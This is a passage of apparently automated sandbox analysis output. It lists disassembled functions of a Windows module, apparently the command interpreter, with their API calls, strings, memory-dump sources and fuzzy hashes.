                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B518
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B58B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$_wcsicmp$AllocProcess
                              • String ID: ELSE$IF/?
                              • API String ID: 3223794493-1134991328
                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                              • Instruction ID: 119d58bdaff431978a18ef9eaa38422f32e52a8a34d0acedfaa2fe9abc6f654d
                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                              • Instruction Fuzzy Hash: 08415C21E1D653C2FB55BFA7A4992B9A661AF84740FCC5075DE0D072DEDE3CE800A720
                              Function 00007FF744F2E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                              • String ID:
                              • API String ID: 1532185241-0
                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                              • Instruction ID: 9659b0c14fb776087d9df37409ceccc8d305594df89b30e7fd29bc0abe352dfc
                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                              • Instruction Fuzzy Hash: A741CF32A08751CBE710BF22948557EBBA1FB88B80F985535EE0A477C8CF3DE8419710
                              Function 00007FF744F04FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                              • String ID:
                              • API String ID: 3588551418-0
                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                              • Instruction ID: ba5bc4421ba938203d89dceb95912afbcce1c3db88f950ff148d71d205a4a8dd
                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                              • Instruction Fuzzy Hash: 27417E31A0C242CBE724BF5294C467DF661FB85B81F985439DE4A477D9CE7CE840AB60
                              Function 00007FF744F2E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                              • String ID:
                              • API String ID: 2123716050-0
                              • Opcode ID: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction ID: 2ee398e939208bad924701480a1b1743a8436dbe89e8b9b6acbef363bc9b7665
                              • Opcode Fuzzy Hash: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction Fuzzy Hash: 914192327096C1CAEB75EF22D8903E967A4FB49B88F484134DE4D4AA9CDE3CD7449710
                              Function 00007FF744F065F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                              • String ID:
                              • API String ID: 3114114779-0
                              • Opcode ID: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction ID: 17151d7b19cfd643087b3c311a53cdc4a7c138a2eec95d7974445837ee1e43e0
                              • Opcode Fuzzy Hash: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction Fuzzy Hash: A2413B36B09B42CAE700EF66D4842AC77A5FB88748F994135DE0D93798DF38E405D760
                              Function 00007FF744F2A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A7AF
                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A80E
                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseErrorLastOpen
                              • String ID:
                              • API String ID: 2240656346-0
                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                              • Instruction ID: ed523091e55cdaf8ffd1806c36e8d25d20efb84485658bc1b221fd67dfe2f48a
                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                              • Instruction Fuzzy Hash: 5231B032A1DA42C7E750BF16E480479F7A5FB88790F994130EE4E427A8DF3DD8419B20
                              Function 00007FF744F2D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F2D0F9
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D10F
                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D166
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F2D17A
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D18C
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                              • String ID:
                              • API String ID: 3008996577-0
                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                              • Instruction ID: a54d2678203819a5042ff587de2706482f84325fa5dbdb8770b43b6c5cf86dad
                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                              • Instruction Fuzzy Hash: 8D212A26A18A51CAF700AF72E8800BDB7B0FB4DB49B885125DE4D93B98DF38D041DB24
                              Function 00007FF744F15CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2C9EE,?,?,?,00007FF744F2EA6C,?,?,?,00007FF744F2E925), ref: 00007FF744F15CCB
                              • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FF744F2C9EE,?,?,?,00007FF744F2EA6C,?,?,?,00007FF744F2E925), ref: 00007FF744F15CDF
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F15D03
                              • fprintf.MSVCRT ref: 00007FF744F1F4A9
                              • fflush.MSVCRT ref: 00007FF744F1F4C2
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                              • String ID:
                              • API String ID: 1826527819-0
                              • Opcode ID: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                              • Instruction ID: d5a4fd6569eee4b161ed752e0412cabe529546e47badd1e5403492f9683b34d9
                              • Opcode Fuzzy Hash: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                              • Instruction Fuzzy Hash: C2010921A0D682CBE704BF26A4941B9EA61FB8A755FC85174DD4F063E9CF3CA4449760
                              Function 00007FF744F25770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateSemaphore
                              • String ID: _p0$wil
                              • API String ID: 1078844751-1814513734
                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                              • Instruction ID: 2bd5ba2e208eabbef076388ef573083409dbb73e9738d86a8f13a6b54dd5c09a
                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                              • Instruction Fuzzy Hash: C451AF61B1E652C6EF21BF5694942B9B290BF84B90FD85435DE0D0B7C8DE3EF405A320
                              Function 00007FF744F2B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF744F2B934
                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF744F15085), ref: 00007FF744F2B9A5
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF744F15085), ref: 00007FF744F2B9F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                              • String ID: %WINDOWS_COPYRIGHT%
                              • API String ID: 1103618819-1745581171
                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                              • Instruction ID: 67372e0d0f2b4d8b7f60994ff4f795831c8e7b437ff53219c0abbd109a329872
                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                              • Instruction Fuzzy Hash: D0417062A1C692C6EB20BF169490279B7A0FB59B90FC95235DE8D033D9EF3DE481D710
                              Function 00007FF744F30774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$_wcslwr
                              • String ID: [%s]
                              • API String ID: 886762496-302437576
                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                              • Instruction ID: 6adfbb461eb0dec56d63163d916dc5fb0e802beeab289385e7de496f7bbfecf2
                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                              • Instruction Fuzzy Hash: 77316032709B82C6EB21EF22D8943E9A7A0FB89B84F884135DE4D47799DF3CD5458310
                              Function 00007FF744F132E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F133A8: iswspace.MSVCRT(?,?,00000000,00007FF744F2D6EE,?,?,?,00007FF744F20632), ref: 00007FF744F133C0
                              • iswspace.MSVCRT(?,?,?,00007FF744F132A4), ref: 00007FF744F1331C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswspace
                              • String ID: off
                              • API String ID: 2389812497-733764931
                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                              • Instruction ID: 43f1122cc37e7da45c333986f5950cbdab0160a929c82ae3e5e4e25694ab804e
                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                              • Instruction Fuzzy Hash: B4212A21E0C652C2FB60BF179495279F6B0EF45B90F8D8135DD8E866C9DE2CE840A225
                              Function 00007FF744F29308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: %s=%s$DPATH$PATH
                              • API String ID: 3731854180-3148396303
                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                              • Instruction ID: cd170875ba26a71c1a983a22f305996eb16cbb08ed7798d60e212e5860772e30
                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                              • Instruction Fuzzy Hash: 4B213A22B0D656C2EB54BF57A48167AA6A4BF84B80FCC4135DD0E477E9DE3DE840A360
                              Function 00007FF744F18198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcscmp
                              • String ID: *.*$????????.???
                              • API String ID: 3392835482-3870530610
                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                              • Instruction ID: 03046f3e8b5f19afad0a2a5b343c7da1a053734361c59edfc0bcec159208d3c9
                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                              • Instruction Fuzzy Hash: 1A115E25B18E92C1E764BF27A580569B2A1EB44B80B9C5031DE8D57B89DE3DE841A720
                              Function 00007FF744F29114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: fprintf
                              • String ID: CMD Internal Error %s$%s$Null environment
                              • API String ID: 383729395-2781220306
                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                              • Instruction ID: 45fee2d87b90eebb4cbeff35de99424d7fad7212ce680fabc5397c4eda03c1c0
                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                              • Instruction Fuzzy Hash: 24115E21A0C542C2FB55BF17E9844B9A261FB447A0FC84331DD79536EC9F3DA441A250
                              Function 00007FF744F104F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                              • API String ID: 1646373207-2530943252
                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                              • Instruction ID: 650cac28589a81186c6fb24176dffc7e8ea226ae793eeed06a538087a64c5a2a
                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                              • Instruction Fuzzy Hash: 5E01C861A0EA16D6EB44BF12A8D1134A6A0AF56730FCC1735DD2E427E8DE7C6881A321
                              Function 00007FF744F273C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: RaiseFailFastException$kernelbase.dll
                              • API String ID: 1646373207-919018592
                              • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                              • Instruction ID: 10f49653431a661db36b716aaeca4a6c930d86d3a6c203d3e5e29b74b77d95f2
                              • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
